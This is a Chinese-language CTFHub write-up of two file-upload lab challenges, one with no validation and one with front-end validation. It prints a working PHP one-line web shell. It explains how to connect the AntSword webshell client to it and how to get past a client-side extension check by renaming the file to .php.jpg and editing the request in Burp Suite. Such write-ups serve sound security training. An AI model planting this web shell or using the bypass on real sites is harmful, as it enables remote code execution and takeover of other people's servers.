CTFHub題解-技能樹-Web-Web工具配置-文件上傳
本文先貼出 無驗證 和 前端驗證 的題解~
(一)無驗證
1.知識點
需要用到的:
(1)一句話木馬
(2)中國蟻劍
下載在這里:
https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1
https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader
2.題解
筆者本來用的是 <?php @eval($_GET["pass"]);?>
上傳發現用蟻劍連接不了~
所以重新換成POST上傳了~
<?php @eval($_POST["pass"]);?>
注意:pass是密碼哦~你可以自定義
下面我們看看有沒有有效的上傳:
訪問一下我們的一句話木馬目錄~
頁面沒有報錯,說明可以訪問!
在蟻劍添加數據:
http://challenge-5bf3cd70198a12f8.sandbox.ctfhub.com:10080/upload/kule.php
pass
(二) 前端驗證
1.知識點
需要用到的:
(1)一句話木馬
(2)中國蟻劍
下載在這里:
https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1
https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader
(3)burpsuite抓包改包
2.題解
先右鍵查看一下源碼~
我們發現,它只允許 jpg、png、gif 格式上傳~
那我們就把一句話木馬改成這三種格式的任意一種吧!
那我們就上傳一個 ddddhm.php.jpg
你可以任意取名~
把文件選擇好,然后打開瀏覽器代理,用burpsuite抓包~
Go一下,頁面200 ok 返回正常
上傳成功啦~
現在我們根據路徑用蟻劍連接~
http://challenge-205ed9ec00cccedf.sandbox.ctfhub.com:10080/upload/kule.php.jpg
pass
好啦~